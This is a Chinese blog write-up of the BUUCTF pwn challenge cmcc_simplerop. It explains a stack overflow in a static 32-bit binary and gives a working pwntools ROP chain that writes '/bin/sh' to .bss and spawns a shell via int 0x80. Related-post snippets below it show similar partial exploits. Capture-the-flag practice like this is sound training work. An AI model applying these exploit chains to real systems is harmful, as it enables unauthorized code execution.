【pwn】 cmcc_simplerop

最新推荐文章于 2025-04-21 21:58:58 发布
原创 最新推荐文章于 2025-04-21 21:58:58 发布 · 796 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文探讨了32位静态链接程序cmcc_simplerop,通过ida分析发现存在栈溢出漏洞。利用ROPgadget找到关键gadget如pop eax;ret和pop edx;pop ecx;pop ebx;ret,计划通过赋值寄存器并使用int 80进行系统调用来应对无/bin/sh的情况,首先将字符串写入bss段。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

例行检查
在这里插入图片描述
ida打开二进制文件发现是静态链接的32位程序。main函数中存在溢出。用ROPgadget查找文件中的gadget。

ROPgadget --binary ./simplerop --only 'pop|ret' >> 1.txt

得到
在这里插入图片描述
发现存在
pop eax;ret
pop edx;pop ecx;pop ebx;ret
这些就足够了,给寄存器赋值再用int 80进行系统调用。
由于程序中没有/bin/sh需要先将其写入bss段。

from pwn import *

io=process('./simplerop')

pop_eax_ret=0x080bae06
pop_bcdx_ret=0x0806e850 
int_80=0x0806EEF0
bss=0x80EB010

pl='a'*0x1c+'bbbb'+p32(pop_eax_ret)+p32(3)+p32(pop_bcdx_ret)+p32(8)+p32(bss)+p32(0)+p32(int_80)+p32(pop_eax_ret)+p32(11)+p32(pop_bcdx_ret)+p32(0)+p32(0)+p32(bss)+p32(int_80)

io.sendline(pl)
io.send('/bin/sh')

io.interactive()
BUUCTF cmcc_simplerop
BengDouLove的博客
04-14 1002
这道题打开ida又是那么一大堆一大堆的函数,也没有外部引用的段,所以就是静态链接把好多函数都链接进来了 所以就和 BUU上另一道 inndy_rop 一样,直接用ROPgadget 去找rop链 from struct import pack # Padding goes here p = '' p += pack('<I', 0x0806e82a) # pop edx ...
BUUCTF:cmcc_simplerop(write up)
qq_44768749的博客
08-26 1068
BUUCTF:cmcc_simplerop0x01 文件分析0x02 运行0x03 IDA0x04 思路0x04-1 解法一0x04-2 解法二0x05 exp解法一解法二 0x01 文件分析 32位程序,开启NX、部分RELRO保护 0x02 运行 输入一串字符串 0x03 IDA main函数 存在栈溢出漏洞 0x04 思路 0x04-1 解法一 该题没有system函数也没有"/bin/sh",也无法泄露函数真实地址 可利用int 80h系统调用 设置系统调用参数即可执行e
cmcc_simplerop
01-07
思路 明显rop可以用工具但是需要自己调一下长度emem exp: from pwn import * from struct import pack #io=process('./simplerop') io=remote('node3.buuoj.cn',27913) io.recvuntil(':') # Padding goes here p = 'a'*0x14+p32(1)*3 p += pack('<I', 0x0806e82a) # pop edx ; ret p += pack('<I', 0x080ea060) # @ .data p += pack('<I', 0x080
[BUUCTF-pwn]——cmcc_simplerop (ropchain)
Y_peak的博客
03-16 638
[BUUCTF-pwn]——cmcc_simplerop 有栈溢出,自己找rop链,最简单的方法,让ROPgadget帮我们弄好呀,可是有点长,所有需要我们修改。毕竟有长度要求。因为“/bin/sh"字符串没有找到,所有这之前的都不动, 下面的pop eax; pop ebx; pop ecx; pop edx除了pop ebx 注意下,其他都可以进行修改 inc就是 ++ exploit 目的:使得excve("/bin/sh") eax = 0xb; ebx ->"/bin/sh"; ecx
cmcc_simplerop--buuctf
最新发布
2301_81060697的博客
04-21 716
主要记录了关于32位的系统调用流程
BUUCTF-PWN-cmcc_simplerop
qq_41743240的博客
04-28 548
BUUCTF-cmcc_simplerop 开了NX IDA反编译 程序非常简单,漏洞也一眼可见 程序里面没有system,这题解法非常多,这里使用mprotect方法修改bss段,执行shellcode exploit: #coding:utf-8 from pwn import * #p=process('simplerop') p=remote('node3.b...
cmcc--simplerop
03-28
cmcc pwn题样本,可以使用多种rop方式进行漏洞利用,打开自己的思路,wp链接: https://blog.youkuaiyun.com/A951860555/article/details/115286266
BUUCTF-pwn刷题记录(22-7-30更新)
Morphy_Amo的博客
03-04 4460
BUUCTF刷题记录
cmcc Simplerop
Morphy_Amo的博客
03-17 4032
rop
BUUCTF----cmcc_simplerop
qq_33010875的博客
09-28 514
环境:WSL2,ubuntu16.04,python2 常规checksec文件: ida反编译: 明显看到read函数会导致栈溢出 gdb调试程序: 用cyclic指令生成100个数字,运行程序: 求输入点到返回地址的偏移: 得到偏移是32,即0x20 值得一提的是,在ida中,我们可以看到偏移是0x18+0x04=0x1c,以gdb调试为准 原因可参考: https://blog.youkuaiyun.com/mcmuyanga/article/details/109260008 文件名给了提示,使用
[BUUCTF]PWN——CmmC_Simplerop
mcmuyanga的博客
11-07 319
cmcc_simplerop 附件 步骤 例行检查,32位,开启了nx保护 本地试运行一下程序,查看一下大概的情况 32位ida载入,习惯性的检索程序里的字符串,看了个寂寞,从main函数开始看程序 参数v4明显的溢出漏洞 对于这种开启了nx保护没有可以利用函数的题,我一般都是利用ret2libc的方法,但是这道题,我查plt表里,居然没有之前调用过的函数的地址, 在参考了其他师傅的wp之后知道了这题是利用的ret2syscall,binsh可以直接写入bss段,这位师傅还在程序里发现了mprote
cmcc simplerop
pondzhang的专栏
05-25 267
from pwn import * p = process('./simplerop') p.recv() int80_addr = 0x080493e1 pop_eax = 0x080bae06 read = 0x0806CD50 binsh = 0x080EB584 pop_edx_ecx_ebx = 0x0806e850 payload = 'a'*0x20 + p32(read) + p32(pop_edx_ecx_ebx) + p32(0) + p32(binsh) + p32(0x8) payl
buuctf cmcc_simplerop
qq_42728977的博客
04-11 382
系统调用+rop https://www.cnblogs.com/bhxdn/p/12330142.html https://blog.youkuaiyun.com/xiaominthere/article/details/17287965
pwn2_sctf_2016
02-16
### 关于 SCTF 2016 中 pwn2 题目的解析 在 SCTF (Security Capture The Flag) 2016 的比赛中,`pwn2` 是一道涉及栈溢出漏洞利用的题目[^1]。此题允许参赛者通过特定输入来覆盖返回地址并控制程序执行流程。 #### ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值